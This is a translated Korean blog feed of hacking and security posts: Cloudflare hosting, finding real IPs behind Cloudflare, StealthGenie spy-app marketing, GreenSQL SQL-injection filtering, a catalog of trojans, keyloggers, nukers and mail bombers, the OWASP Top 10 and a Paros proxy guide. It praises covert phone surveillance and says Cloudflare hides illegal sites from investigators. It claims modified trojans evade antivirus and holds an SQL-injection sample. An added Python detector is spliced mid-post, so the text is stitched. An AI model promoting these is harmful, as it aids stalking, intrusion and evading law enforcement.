Youngsam.net: Hacking & Security category post list
https://youngsam.net/
IT powerhouse = Welcome to Kim Young-sam's blog.
2023-11-23T14:07:21+09:00
Textcube 1.10.9 : Tempo primo

A site offering free & paid DNS and free HTTPS service
openkr
https://youngsam.net/entry/%EB%AC%B4%EB%A3%8C%EC%9C%A0%EB%A3%8C-DNS-%EB%B0%8F-HTTPS-%EC%84%9C%EB%B9%84%EC%8A%A4%EB%A5%BC-%EB%AC%B4%EB%A3%8C-%EC%A7%80%EC%9B%90-%EC%82%AC%EC%9D%B4%ED%8A%B8
2019-10-30T15:01:55+09:00
2019-10-30T15:01:55+09:00
The site is https://dash.cloudflare.com.<br /><br />It supports HTTPS service for free as well. You only need to register DNS records, with no SSL certificate.<br /><br />It is widely used by illegal sites. The free service is stable, but if you are a little unhappy with the speed, going with the paid service would also be fine.<br /><br />Googling CloudFlare will easily turn up instructions.<br /><br />To add a little more: features such as DNS, DDoS, CDN, SSL and Page Rules are free.

Network packet capture program SmartSniff - Korean version
openkr
https://youngsam.net/entry/%EB%84%A4%ED%8A%B8%EC%9B%8C%ED%81%AC-%ED%8C%A8%ED%82%B7-%EC%BA%A1%EC%B3%90-%ED%94%84%EB%A1%9C%EA%B7%B8%EB%9E%A8-SmartSniff-1
2019-05-09T10:59:46+09:00
2019-05-09T10:59:29+09:00
This is a smart packet sniffer program.<br /><br />Use the network packet capture program SmartSniff to inspect network packets.<div class="imageblock center" style="text-align: center; clear: both;"><a class="extensionIcon" href="https://www.youngsam.net/attachment/3191209783.zip"><img src="https://youngsam.net/resources/image/extension/unknown.gif" alt="" /> </a></div>

Web vulnerability scanning tool
openkr
https://youngsam.net/entry/%EC%9B%B9-%EC%B7%A8%EC%95%BD%EC%A0%90-%EC%A7%84%EB%8B%A8%ED%88%B4
2018-08-03T12:34:13+09:00
2018-08-03T12:34:10+09:00
<div>Supported OS: Windows </div>
<div></div>
<div>Development environment: Qt (C++) </div>
<div></div>
<div>Usage restrictions: none </div>
<div></div>
<div>Description: </div>
<div></div>
<div>ahoonScanner </div>
<div></div>
<div>- Pattern- and signature-based web vulnerability scanning tool </div>
<div>- SQL injection, XSS, download, information disclosure, etc. </div>
<div>- Result screenshot capture, reports, real-time view </div>
<div></div>
<div>For more details, use the help. </div>
<div></div>
<div>Download it from the link below. </div>
<div></div>
<div>https://drive.google.com/file/d/0Bw865yAScbYfYXQzSUQ5NllwWU0/view <br /><br /><div class="imageblock center" style="text-align: center; clear: both;"><a class="extensionIcon" href="https://www.youngsam.net/attachment/2482442254.zip"><img src="https://youngsam.net/resources/image/extension/zip.gif" alt="" /> ahoonwebscanner_portable.zip</a></div></div>
<div></div>
<div></div>
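<div>Caution) Using it against other sites can become a legal problem, so please keep that in mind.</div>

With Cloudflare CDN, a subdomain mistake can reveal the real IP
openkr
https://youngsam.net/entry/Cloudflare-CDN-%EC%84%9C%EB%B8%8C-%EB%8F%84%EB%A9%94%EC%9D%B8-%EC%9C%BC%EB%A1%9C-%EC%A7%84%EC%A7%9C-IP-%EC%9E%A1%EC%9D%84%EC%88%98-%EC%9E%88%EC%8A%B5%EB%8B%88%EB%8B%A4
2017-03-23T01:27:54+09:00
2017-03-23T01:17:32+09:00
A friend called me this morning T_T<br /><br />It is not entirely illegal, but he was uneasy, so he kept the server in Korea and hid the real IP behind Cloudflare CDN, and he contacted me to ask for a test just in case.<br /><br />Normally, when the IP is hidden behind Cloudflare CDN, it is hard to find the IP in Korea from the domain information alone. That is why, even when an illegal site is run in Korea, the Ministry of Culture, Sports and Tourism and the cyber investigation units cannot do anything and only block the domain. Even with the domain blocked, ordinary users can still connect if the site is set up over HTTPS. So far, blocking access to illegal sites configured with HTTPS is difficult.<br /><br />The Ministry of Culture, Sports and Tourism (an affiliated body), which manages copyright, is probably investigating torrent and other illegal sites, but it only cracks down on sites run by people without specialist knowledge who get hosting, run a homepage on open-source software and upload a few torrent files.<br /><br />For ordinary sites like these, they check the IP (by pinging the domain), identify the carrier through http://whois.kisa.or.kr/kor/main.jsp and, unless it is urgent, locate the IP through an official request, obtain a search and seizure warrant, and carry out the search. lol<br /><br />An elementary school student who does not know any better would be scared when they barge in with a search and seizure warrant!<br /><br />It seems their role goes as far as investigating like this and handing the case to the prosecution. Then MBC runs a story along the lines of "Ministry of Culture uses top-class technology in intensive crackdown on illegal torrent sites, 100% results".<br /><br />Someone caught without knowing better gets a fine of about 10 million won. The reason I know this so well is that I once developed a torrent collector and, while running it as a test, did not realize Google was indexing it. I found out later and blocked access to the site.<br /><br />After that, the Ministry of Culture came to my office with a search and seizure warrant. I told them the site was not in operation and could not even be reached, but, perhaps simply seeing it as a result to report, they started searching the PCs. There were no torrent files, but development source code and the like turned up.<br /><br />From then on I had to go all the way to Daejeon to be questioned.<br /><br />I think I went about 10 times. My employees were questioned too T_T Damn.<br /><br />The case then went to the prosecution and a fine of 10 million won was imposed.<br /><br />It was a hassle, so I just admitted it, paid the fine and that was the end of it. If I had been thinking about illegal activity, running a site or making a profit,<br /><br />I would have run it through Cloudflare CDN from the start and they would never have caught me, so I just lost 10 million won. lol<br /><br />Anyway,<br /><br />normally the domain is hidden behind Cloudflare.
<br /><br />And to avoid blocking, traffic is redirected to HTTPS. However, a subdomain is often pointed at the real IP by mistake during development.<br /><br /><br />Here is how to check for this.<br /><br />
<div>There is a site called Cloudflare Resolver. Try searching there.<br /><br /></div>
<div><a title="https://exonapps.nl/cfresolver/index.php" href="https://exonapps.nl/cfresolver/index.php">https://exonapps.nl/cfresolver/index.php<br /></a></div>
<br />You can check the IPs linked to the records for the NS names in use on CloudFlare. When I searched my friend's domain, the FTP IP showed up.<br /><br />I called my friend and told him.<br /><br />PS: The administrator's IP can be found by way of writing a post on the bulletin board. Only the quick-witted will pick up on it ^^

Smartphone eavesdropping and location-tracking apps still exist.
openkr
https://youngsam.net/entry/%EC%95%84%EC%A7%81%EB%8F%84-%EC%8A%A4%EB%A7%88%ED%8A%B8%ED%8F%B0-%EB%8F%84%EC%B2%AD-%EC%9C%84%EC%B9%98%EC%B6%94%EC%A0%81-APP-%EC%9D%B4-%EC%9E%88%EC%8A%B5%EB%8B%88%EB%8B%A4
2017-03-22T21:05:22+09:00
2017-03-22T18:51:20+09:00
<p>After I first bought a smartphone and developed various programs, I saw how easily smartphone location tracking could be done and was worried about the repercussions.</p>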
<p> </p>
<p>Seeing that smartphone location tracking developed in 2010 still works today, what is Google doing?</p>
<p> </p>
<p>Today I visited the SPYCELLPHONE site. This notice comes up.</p>
<p> </p>
<p><img src="https://youngsam.net/attach/1/1212446577.png" /></p>
<p> </p>
<p>This is what it says when translated into Korean.</p>
<p> </p>
<p><img src="https://youngsam.net/attach/1/7293838317.png" /></p>
<p> </p>
<p>It says the site has been temporarily shut down because of legal issues.</p>
<p> </p>
<p>While looking around the site,</p>
<p style="text-align: center;"> </p>
<p style="text-align: center;"><img src="https://youngsam.net/attach/1/7264363611.png" /></p>
<p style="text-align: center;"> </p>
<p>I found this picture, along with a claim that spying on KakaoTalk is possible. Looking more closely at the other content, it says this is still possible.</p>
<p> </p>
<p>This is the existing content.</p>
<p>I'll copy the feature descriptions and paste them here.</p>
<p> </p>
<h2><span style="color: #303030; font-size: 21pt;">Basic</span></h2>
<p style="background: white;"><span style="color: #3e3e3e;">StealthGenie provides the basic features offered by other mobile spy software along with some practical extras. The 'Basic' monthly plan allows monitoring call history, reading all sent and received SMS messages, and viewing contacts and bookmarks, appointments and calendar information. StealthGenie Basic also provides real-time GPS monitoring and location history.<br /><br />For many people, these features will be enough. StealthGenie Basic performs them well, and for those who, for example, only want to keep a rough eye on their children's whereabouts, these features are probably all they need from a spy phone app. If you have no time or inclination to use the advanced features, StealthGenie Basic performs all the common functions at a fairly low monthly service price.</span></p>
<h3><span style="color: #303030; font-size: 21pt;">Advanced features</span></h3>
<p style="background: white;"><span style="color: #3e3e3e;">However, what makes this product unique among the mobile spy apps on the market today is StealthGenie's advanced features. The innovative ones come with the StealthGenie 'Gold' package, which costs only a few dollars more each month.</span></p>
<h4><span style="color: #303030; font-size: 15pt;"><strong>Virtual boundary setting</strong></span></h4>
<p style="background: white;"><span style="color: #3e3e3e;">One of the neat features this company has developed is 'virtual boundary setting'. With it you can set up 'safe' zone and 'restricted' zone alerts that tell you when the target phone and its user leave an area you have designated as safe or enter an area you consider dangerous or off-limits. These zones are easy to define using the map display in the control panel of your personal account. This feature is especially useful for parents interested in buying mobile spyware to track their children's whereabouts and movements. With safe zones, you can tell whether your teenager left school early or is away from home at a time when they should be studying. Restricted zones tell you whether the target phone enters an area that is off-limits to the phone's user.</span></p>
<p style="background: white;"><span style="color: #303030;"><span style="font-size: 15pt;"><strong>Messenger, Viber and Skype monitoring</strong></span></span></p>
<p style="background: white;"><span style="color: #3e3e3e;">With StealthGenie Gold you can access Skype calls, messages and contacts as well as WhatsApp and iMessage chats and Viber calls and messages.</span></p>
<p style="background: white;"><span style="color: #303030;"><span style="font-size: 15pt;"><strong>Email monitoring</strong></span></span></p>
<p style="background: white;"><span style="color: #3e3e3e;">With StealthGenie Gold, the user can access Gmail and read sent and received emails. Many spy apps can only access the phone's email function and cannot access a Gmail account. This is one of the features some people may find very useful.</span></p>
<h4><span style="color: #303030; font-size: 15pt;"><strong>Ambient sound recording</strong></span></h4>
<p style="background: white;"><span style="color: #3e3e3e;">This feature lets you listen to and record the sounds around the target phone. It allows the phone to be used as a bugging device for listening to conversations or other activity taking place near the phone. Many people see this as a very attractive feature, and most good spy apps now offer it in their packages.</span></p>
<p style="background: white;"><span style="color: #303030;"><span style="font-size: 15pt;"><strong>Multimedia access</strong></span></span></p>
<p style="background: white;"><span style="color: #3e3e3e;">With StealthGenie Gold, you can view photos and videos and also listen to music files stored on the phone.</span></p>
<p style="background: white;"> </p>
<p style="background: white;"><span style="color: #303030;"><span style="font-size: 15pt;"><strong>Instant alerts</strong></span></span></p>
<p style="background: white;"><span style="color: #3e3e3e;">One of StealthGenie's interesting features is that the user can specify 'suspicious' words and phone numbers. When a particular word or set of words is entered on the target phone, you receive an instant alert. The same goes for phone numbers. You are notified immediately by email and/or SMS. As far as I know, StealthGenie is currently the only company offering this feature, and it is certainly useful in some situations.</span></p>
<p style="background: white;"> </p>
<p style="background: white;"><span style="color: #3e3e3e;">StealthGenie works on phones and tablets running iPhone, Android and BlackBerry iOS or OS. Unfortunately for Symbian and Windows users, StealthGenie does not currently support those devices.</span></p>
<p style="background: white;"> </p>
<p style="background: white;"><span style="color: #3e3e3e;">StealthGenie is a well-designed, user-friendly spy phone app with many great features that work as advertised. I could not find a problem with any of its features, and all of them were very easy to understand and use.<br /><br />The control panel is simple, and even people who are not technical at all will get the hang of the controls and settings fairly quickly. The demo page is definitely recommended for new users who want to get a feel for what StealthGenie is and how it is used.</span></p>
<p><span style="color: #3e3e3e;"><span style="background-color: white;">StealthGenie is not the cheapest option around, but considering the features offered in its two packages, the price is competitive enough and the company has a good reputation.
The company has been in this business for quite a while now and keeps developing the features of its product in innovative and useful ways.</span></span></p>
<p> </p>
<p><span style="color: #3e3e3e;"><span style="background-color: white;">Conclusion:</span></span></p>
<p> </p>
<p><span style="color: #3e3e3e;"><span style="background-color: white;">Trojans such as NetBus still exist today. (You think they cannot be used because antivirus catches them?)</span></span></p>
<p><span style="color: #3e3e3e;"><span style="background-color: white;">Because much of it is open source, modifying part of the source still lets it go undetected by antivirus and take over a PC.</span></span></p>
<p>Even on smartphones there is no way to fundamentally prevent Trojans like these from being used. I think Apple is at least a step ahead in this respect.</p>
[Security] GreenSQL, which blocks SQL injection openkr https://youngsam.net/entry/%EB%B3%B4%EC%95%88-Sql-injection%EC%9D%84-%EB%A7%89%EC%95%84%EC%A3%BC%EB%8A%94-Green-SQL 2012-08-24T10:55:55+09:00 2012-08-24T10:55:55+09:00
GreenSQL ( <A href="http://www.greensql.net/" target=_blank>http://www.greensql.net/</A> ) is a proxy-style application that defends MySQL against SQL injection attacks. When a web page is requested, its DB queries are first handed to GreenSQL, which inspects them and forwards them to the MySQL server only if they look normal.<BR>Installing and running GreenSQL works like this. The MySQL server keeps running as before (default port 3306), and GreenSQL is started on port 3305 (127.0.0.1:3305). GreenSQL then opens its own connection to the MySQL server. The web pages only need their DB connection changed to point at GreenSQL's port 3305. (You could also run MySQL on 3305 and GreenSQL on 3306.)<BR><BR><BR>[ Image source: GreenSQL home page ]<BR><BR>How does it decide whether a DB query is normal or abnormal?<BR><BR>1) It uses pattern matching to find 'SQL types that an administrator would run' and 'sensitive SQL types' (flush privileges, show commands, illegal forms, and so on) and treats them as illegal requests. For example, DB administration commands, attempts to change the DB schema, and attempts to access system files are treated as illegal. These patterns can be changed in the configuration file.<BR><BR>2) After that, each query type has a score assigned to it, and these scores are added up. When the total is at or above the configured value, GreenSQL can emit a warning message or block the query. The types are as follows.<BR><BR>* Access to sensitive tables increases risk query (users, accounts, credit information)<BR>* Comments inside SQL commands increases query risk<BR>* Usage of an empty password string<BR>* Found ‘or’ token inside query<BR>* Found SQL expression that always return true (SQL tautology)<BR>* Comparison of constant values (SQL tautology)<BR>* ... and so on ...<BR><BR>The scores can be changed in the configuration file. The following is part of the sample configuration file.<BR># If query risk is bigger then specified value, query will be blocked<BR>block_level = 30<BR># Level of risk used to generate warnings. It is recomended to run application<BR># in low warning level and then to acknowledge all valid queries and<BR># then to lower the block_level<BR>warn_level=20<BR># Risk factor associated with SQL comments<BR>risk_sql_comments=30<BR><BR>Here is a sample log of a blocked query. (Provided by sCag. Thank you.)<BR><BR>2008-12-09 16:54:18 mysql SELECT * FROM user WHERE name = 'x' or 1=1; --' AND pwd=SHA('') blocked<BR><BR>My conclusions on GreenSQL:<BR><BR>It is a great idea. ^^<BR>Pattern settings and the block level can be changed flexibly.<BR>It supports most Linux distributions, and FreeBSD as well.<BR>Performance testing shows a slight performance degradation (about 2~12%).<BR>It is probably not suitable for high-volume services.<BR>It is worth considering for small sites or web hosting.<BR>It would be great if the features offered by SQL Relay (DB pooling, load balancing, and so on) were combined with it.<BR><BR>Source: <A href="http://truefeel.tistory.com/129" target=_blank>http://truefeel.tistory.com/129</A><BR><BR>Download: <A href="http://www.greensql.net/download" target=_blank>http://www.greensql.net/download</A>
Hacking tools classified by function - summary openkr https://youngsam.net/entry/%ED%95%B4%ED%82%B9%ED%88%B4-%EA%B8%B0%EB%8A%A5%EB%B3%84-%EB%B6%84%EB%A5%98-%EC%A0%95%EB%A6%AC 2012-07-27T20:20:57+09:00 2012-07-27T20:20:57+09:00
<p>============================================================================== <br>Trojan Virus / Hacking Tool <br>============================================================================== <br>Back Orifice 2000 --- Back Orifice 2000, released by cDc <br>Back Orifice 1.20 --- Back Orifice, released by cDc <br>Back Orifice 1.3 --- Another upgraded version of BO <br>Resident registration number generator --- Generates resident registration numbers <br>Infector 2 --- A BOSERVE.EXE that V3 does not detect <br>Deep Bo --- Upgraded version of BO!! 
(handy IP Sweep feature) <br>Bo Plug-in --- Three BO plug-ins (ButtTrumpet, SilkRope, BOFTP) <br>No BO 13a --- Program dedicated to blocking BO hacking <br>Net Bus 1.70 --- Trojan hacking program that rivals BO <br>Net Bus Pro B --- NetBus 2 Pro beta version, original title NetBus 2 Atomic Toxic <br>Net Bus Pro 2.01 --- NetBus Pro 2.01 <br>Netbus Pro 2.1 Dropper --- Netbus Pro 2.1 Dropper <br>Lock Down 2000 Trojan Virus --- Dedicated detection + removal program <br>BO SPY --- For people who use the BO GUI <br>Cleaner 2.0 --- BO detection & removal program <br>BO Scanner --- Program similar to Cleaner 2.0 <br>BO Remove --- Removes BO only <br>Modem Jammer --- Program that erases the IP path <br>Infector 2 --- A BOSERVE.EXE that V3 does not detect <br>School Bus --- This is School Bus. <br>Deepthroat --- BO server that nobo does not catch <br>Subseven --- The v1.7 Trojan. <br>Subseven --- 2.1 with bugs patched <br>Pphucker --- A Trojan called pphucker </p><p>============================================================================== <br>Port scanning <br>============================================================================== <br>Port Scanner --- A port scanner. <br>Port Pro // <br>Port Test // <br>ChaOscan // <br>Tcp port scanner // <br>FTP Scanner --- Finds FTP servers by IP address </p><p>============================================================================== <br>WWW hacking <br>============================================================================== <br>Wwwhack98 --- The best-known web hacking program <br>Webcrack --- Web hacking program with special features <br>HackerTTP1_3 --- The fastest web hacking program <br>Goldeneye --- A web hacking program called Goldeneye </p><p>============================================================================== <br>Nuking <br>============================================================================== <br>Mass nuker --- Very powerful nuking program <br>Port Fuck --- Blocks ports on Windows 98 <br>Win nuke --- Freezes the Windows 95 screen <br>Nuke --- Powerful nuking program <br>Nuke`em --- Crashes the computer <br>E-mail Nuker --- Wipes out the other party's e-mail <br>Voob --- Crashes the computer </p><p>=============================================================================== <br>Keyloggers <br>============================================================================== <br>Keylog 97 --- Systematically stores every character typed on the keyboard, by date <br>Keylog25 // <br>Passpy // <br>Keylog // <br>Key rec // </p><p>============================================================================= <br>Unix/Linux <br>============================================================================== <br>Mail bomb script --- Mail bomb for Linux/Unix <br>satan --- A tool called SATAN that finds vulnerabilities <br>saint --- SAINT, an improved SATAN <br>hack unix --- Hacking program for Unix <br>fire wall --- Firewall for Linux <br>Sniffer --- Program for covert eavesdropping </p><p>============================================================================== <br>Mail bombers <br>============================================================================== <br>AnonMail --- Set your own e-mail address to whatever you want.. <br>Avalanche --- Mail bomb <br>QFbomber --- Easy-to-use mail bomber <br>Aenima17 --- Mail bomber <br>Bomb Mail --- Mail bomber <br>E-mail Bombing --- Mail bomber <br>Kaboom3 --- Sends 999 mails <br>Port Fuck! --- Sends mail bombs to Win98 users (nuking tool, W98) </p><p>============================================================================== <br>Crackers <br>=============================================================================== <br>bus hacker --- Changes the NetBus password <br>John the ripper --- Cracks Unix PASSWD files <br>Crack Jack // <br>DateCrack --- Removes date limits <br>Unix password cracker --- Unix password cracker. 
For DOS <br>Zip ZIP --- Cracks file passwords <br>Trumpet Winsock --- Cracks Trumpet Winsock passwords <br>UNP --- Unpacks self-compressed files <br>UX --- Unpacks self-compressed files <br>Micro excel cracker --- Removes Excel passwords <br>Soft Ice --- SoftICE for Windows <br>Screen saver cracker --- Recovers the Windows screen saver password <br>John The Ripper 1.0 --- The most famous and powerful cracking program, which set legendary cracking records <br>codex TCP/IP Hacker </p><p>============================================================================== <br>Passwords <br>============================================================================= <br>Dripper --- Shows which ID and PW are currently used to connect <br>Revelation --- Reveals passwords shown as **** in Windows <br>Cmos password --- Change the CMOS password at will </p><p>============================================================================== <br>Viruses <br>============================================================================= <br>Jerusalem <br>Ping Pong <br>Virus Maker 1, 2, 3 </p><p>============================================================================ <br>Defense / tracing <br>============================================================================== <br>Cleaner 2.0 --- Scans for and removes 38 Trojans <br>Visual Route --- Enter just an IP and get the other party's country and region.. <br>Lock Down 2000 --- Trojan scanner on a par with Cleaner <br>X-ray file analyzer <br>Nobo --- Blocks BO intruders and reports their IP <br>Bospy --- Hacks back against Deep Bo intruders.. <br>No Nuke --- Blocks nuking <br>Nuke Nabber --- Blocks nuking <br>Neotrc201 --- IP tracer <br>Antigen102 <br>Net Buster --- Removes NetBus and repels intruders <br>Fire wall 98 --- Personal firewall <br>Bo remover --- Removes Back Orifice quickly <br>Conseal fire wall --- Personal firewall <br>T.D.S.2 --- Removes 294 Trojans </p><p>=========================================================================== <br>Essential utilities <br>============================================================================= <br>Jammer --- Erases your own connection path. <br>HAKTEK --- Port scan, finger, mail bomber and more in one <br>com2exe --- *.com to *.exe files... <br>bat2exe --- *.bat to *.exe files... <br>exe2com --- *.exe files to *.com files... 
<br>mouse.com --- Program for bringing up the mouse, occasionally needed <br>winnt->dos --- Mounts Windows NT files in DOS</p>
Top 10 major web vulnerabilities openkr https://youngsam.net/entry/%EC%A3%BC%EC%9A%94-%EC%9B%B9-%EC%B7%A8%EC%95%BD%EC%A0%90-TOP-10 2012-07-20T21:19:37+09:00 2012-07-20T21:19:37+09:00
A1: Injection <br>A2: Cross-Site Scripting (XSS) <br>A3: Broken Authentication and Session Management <br>A4: Insecure Direct Object References <br>A5: Cross-Site Request Forgery (CSRF) <br>A6: Security Misconfiguration <br>A7: Insecure Cryptographic Storage <br>A8: Failure to Restrict URL Access <br>A9: Insufficient Transport Layer Protection <br>A10: Unvalidated Redirects and Forwards
GreenSQL, which blocks SQL injection openkr https://youngsam.net/entry/Sql-injection%EC%9D%84-%EB%A7%89%EC%95%84%EC%A3%BC%EB%8A%94-Green-SQL 2012-07-20T20:36:46+09:00 2012-07-20T20:36:46+09:00
GreenSQL ( <a href="http://www.greensql.net/" target="_blank">http://www.greensql.net/</a> ) is a proxy-style application that defends MySQL against SQL injection attacks. When a web page is requested, its DB queries are first handed to GreenSQL, which inspects them and forwards them to the MySQL server only if they look normal.<br>Installing and running GreenSQL works like this. The MySQL server keeps running as before (default port 3306), and GreenSQL is started on port 3305 (127.0.0.1:3305). GreenSQL then opens its own connection to the MySQL server. The web pages only need their DB connection changed to point at GreenSQL's port 3305. (You could also run MySQL on 3305 and GreenSQL on 3306.)<br><br><br>[ Image source: GreenSQL home page ]<br><br>How does it decide whether a DB query is normal or abnormal?<br><br>1) It uses pattern matching to find 'SQL types that an administrator would run' and 'sensitive SQL types' (flush privileges, show commands, illegal forms, and so on) and treats them as illegal requests. For example, DB administration commands, attempts to change the DB schema, and attempts to access system files are treated as illegal. These patterns can be changed in the configuration file.<br><br>2) After that, each query type has a score assigned to it, and these scores are added up. When the total is at or above the configured value, GreenSQL can emit a warning message or block the query. The types are as follows.<br><br>* Access to sensitive tables increases risk query (users, accounts, credit information)<br>* Comments inside SQL commands increases query risk<br>* Usage of an empty password string<br>* Found ‘or’ token inside query<br>* Found SQL expression that always return true (SQL tautology)<br>* Comparison of constant values (SQL tautology)<br>* ... and so on ...<br><br>The scores can be changed in the configuration file. The following is part of the sample configuration file.<br># If query risk is bigger then specified value, query will be blocked<br>block_level = 30<br># Level of risk used to generate warnings. It is recomended to run application<br># in low warning level and then to acknowledge all valid queries and<br># then to lower the block_level<br>warn_level=20<br># Risk factor associated with SQL comments<br>risk_sql_comments=30<br><br>Here is a sample log of a blocked query. (Provided by sCag. Thank you.)<br><br>2008-12-09 16:54:18 mysql SELECT * FROM user WHERE name = 'x' or 1=1; --' AND pwd=SHA('') blocked<br><br>My conclusions on GreenSQL:<br><br>It is a great idea. ^^<br>Pattern settings and the block level can be changed flexibly.<br>It supports most Linux distributions, and FreeBSD as well.<br>Performance testing shows a slight performance degradation (about 2~12%).<br>It is probably not suitable for high-volume services.<br>It is worth considering for small sites or web hosting.<br>It would be great if the features offered by SQL Relay (DB pooling, load balancing, and so on) were combined with it.<br><br>Download: <a href="http://www.greensql.net/download" target="_blank">http://www.greensql.net/download</a>
paros-3.2.13-win.exe - How to use Paros (web proxy) openkr https://youngsam.net/entry/paros-3213-winexe-Paros-%EC%9B%B9%ED%94%84%EB%A1%9D%EC%8B%9C-%EC%82%AC%EC%9A%A9%EB%B2%95 2011-11-12T15:51:22+09:00 2011-11-12T15:51:05+09:00
<p style="margin: 0cm 0cm 0pt;"><b style="mso-bidi-font-weight: normal;"><span style="font-family: 돋움;">With this proxy tool you can view request data in transit and also modify it before the request is sent.<br>This is how data ends up being tampered with.</span></b>
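Going back to the two GreenSQL entries above: the following is an added example, not GreenSQL's code and not part of the original posts, of the two-stage check they describe, a pattern stage followed by risk scoring against warn_level and block_level. block_level, warn_level and risk_sql_comments use the values from the sample configuration; every other weight, the table and command word lists and the regex tokenizer are assumptions.

```python
import re

# block_level, warn_level and risk_sql_comments come from the sample config in
# the post; every other weight and word list below is an assumption.
CONFIG = {
    "block_level": 30,
    "warn_level": 20,
    "risk_sql_comments": 30,
    "risk_or_token": 10,
    "risk_const_compare": 10,
    "risk_tautology": 30,
    "risk_sensitive_tables": 10,
    "risk_empty_password": 30,
}
SENSITIVE_TABLES = {"user", "users", "account", "accounts", "credit_card"}
ADMIN_WORDS = {"flush", "show", "grant", "revoke", "drop", "alter", "create"}

TOKEN = re.compile(r"""
    (?P<comment> --[^\n]* | \#[^\n]* | /\*.*?(?:\*/|$) )
  | (?P<str>     '(?:[^'\\]|\\.)*'? | "(?:[^"\\]|\\.)*"? )
  | (?P<num>     \d+(?:\.\d+)? )
  | (?P<word>    [A-Za-z_][A-Za-z0-9_]* )
  | (?P<op>      <> | != | <= | >= | [=<>();,*] )
""", re.X | re.S)


def tokenize(sql):
    """Split sql into (kind, value) tokens; comments are dropped but noted."""
    tokens, has_comment = [], False
    for m in TOKEN.finditer(sql):
        kind, text = m.lastgroup, m.group()
        if kind == "comment":
            has_comment = True
        elif kind == "str":
            closed = len(text) >= 2 and text[-1] == text[0]
            tokens.append(("const", text[1:-1] if closed else text[1:]))
        elif kind == "num":
            tokens.append(("const", text))
        elif kind == "word":
            tokens.append(("word", text.lower()))
        else:
            tokens.append(("op", text))
    return tokens, has_comment


def has_empty_password(toks):
    """True if a password-like column is compared with an empty string."""
    for i, (kind, val) in enumerate(toks[:-1]):
        if kind == "word" and re.search(r"pass|pwd", val) and toks[i + 1] == ("op", "="):
            for tok in toks[i + 2:]:
                if tok in (("word", "and"), ("word", "or"), ("op", ";")):
                    break
                if tok == ("const", ""):
                    return True
    return False


def assess(sql, cfg=CONFIG):
    """Return {'verdict', 'risk', 'reasons'} for one query."""
    toks, has_comment = tokenize(sql)
    words = [v for k, v in toks if k == "word"]
    pairs = set(zip(words, words[1:]))
    # Stage 1: administrative, schema-changing and file-access statements.
    if (words and words[0] in ADMIN_WORDS) or "load_file" in words \
            or pairs & {("into", "outfile"), ("into", "dumpfile")}:
        return {"verdict": "blocked", "risk": None,
                "reasons": ["admin_or_illegal_pattern"]}
    # Stage 2: add up the risk of every trait present in the query.
    reasons = []
    if has_comment:
        reasons.append("sql_comments")
    if "or" in words:
        reasons.append("or_token")
    for a, op, b in zip(toks, toks[1:], toks[2:]):
        if a[0] == "const" and op == ("op", "=") and b[0] == "const":
            if "const_compare" not in reasons:
                reasons.append("const_compare")
            if a[1] == b[1] and "tautology" not in reasons:
                reasons.append("tautology")
    if any(k1 == k2 == "word" and w1 in ("from", "join", "into", "update")
           and w2 in SENSITIVE_TABLES
           for (k1, w1), (k2, w2) in zip(toks, toks[1:])):
        reasons.append("sensitive_tables")
    if has_empty_password(toks):
        reasons.append("empty_password")
    risk = sum(cfg["risk_" + r] for r in reasons)
    # "At or above" follows the post's wording for the threshold.
    if risk >= cfg["block_level"]:
        verdict = "blocked"
    elif risk >= cfg["warn_level"]:
        verdict = "warned"
    else:
        verdict = "passed"
    return {"verdict": verdict, "risk": risk, "reasons": reasons}


# The query from the blocked sample log line in the post.
PAGE_LOG_QUERY = "SELECT * FROM user WHERE name = 'x' or 1=1; --' AND pwd=SHA('')"

if __name__ == "__main__":
    print(assess(PAGE_LOG_QUERY))
```

String literals are tokenized as constants, so an `or` or `--` that appears inside a quoted value does not add risk.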
<p style="margin: 0cm 0cm 0pt;"><span style="font-family: 돋움;"> </span>
<p style="margin: 0cm 0cm 0pt;"><span style="font-family: 돋움;">Here are two of the most representative proxy tools.</span>
<p style="margin: 0cm 0cm 0pt;"><span style="font-family: 돋움;"> </span>
<p style="margin: 0cm 0cm 0pt;"><b style="mso-bidi-font-weight: normal;"><span style="font-family: 돋움;">[1] Paros</span></b>
<p style="margin: 0cm 0cm 0pt;"><b style="mso-bidi-font-weight: normal;"><span style="font-family: 돋움;">1. Overview</span></b>
<p style="margin: 0cm 0cm 0pt;"><span style="font-family: 돋움;">It can be called the most widely used proxy tool at present.</span>
<p style="margin: 0cm 0cm 0pt;"><span style="font-family: 돋움;">The interface is quite intuitive and it is convenient to operate.</span>
<p style="margin: 0cm 0cm 0pt;"><span style="font-family: 돋움;">It can be downloaded from the address below.</span>
<p style="margin: 0cm 0cm 0pt;"><span style="font-family: 돋움;"><a href="http://www.parosproxy.org/download.shtml" target="_blank"><ins><font color="#800080">http://www.parosproxy.org/download.shtml</font></ins></a></span>
<br><div class="imageblock center" style="text-align: center; clear: both;"><a class="extensionIcon" href="https://www.youngsam.net/attachment/1239063452.xxx"><img src="https://youngsam.net/resources/image/extension/exe.gif" alt="" /> paros-3.2.13-win.exe</a></div><br><p style="margin: 0cm 0cm 0pt;">
<p style="margin: 0cm 0cm 0pt;"><b style="mso-bidi-font-weight: normal;"><span style="font-family: 돋움;">2. Installation</span></b>
<p style="margin: 0cm 0cm 0pt;"><span style="font-family: 돋움;">Paros runs on the JVM.</span>
<p style="margin: 0cm 0cm 0pt;"><span style="font-family: 돋움;">That means you need to install a JDK that matches your operating system.</span>
<br>JDK download <a href="http://www.oracle.com/technetwork/java/javase/downloads/index.html">http://www.oracle.com/technetwork/java/javase/downloads/index.html</a><br><span style="font-family: 돋움;">Then install Paros.</span>
<p style="margin: 0cm 0cm 0pt;"><span style="font-family: 돋움;"> </span>
<p style="margin: 0cm 0cm 0pt;"><b style="mso-bidi-font-weight: normal;"><span style="font-family: 돋움;">3. Configuration</span></b>
<p style="margin: 0cm 0cm 0pt;"><b style="mso-bidi-font-weight: normal;"><span style="font-family: 돋움;">a. Checking the proxy port</span></b>
<p style="margin: 0cm 0cm 0pt;"><span style="font-family: 돋움;">To use Paros as a web proxy, first check which port Paros is using.</span> <br>
<p style="margin: 0cm 0cm 0pt;"><span style="font-family: 돋움;">Go to the <b style="mso-bidi-font-weight: normal;">Tool > Option</b> menu as shown below and the options window opens. In the <b style="mso-bidi-font-weight: normal;">Local proxy</b> section, port <b style="mso-bidi-font-weight: normal;">8080</b> is the port that will be used for the web proxy.</span> <br>
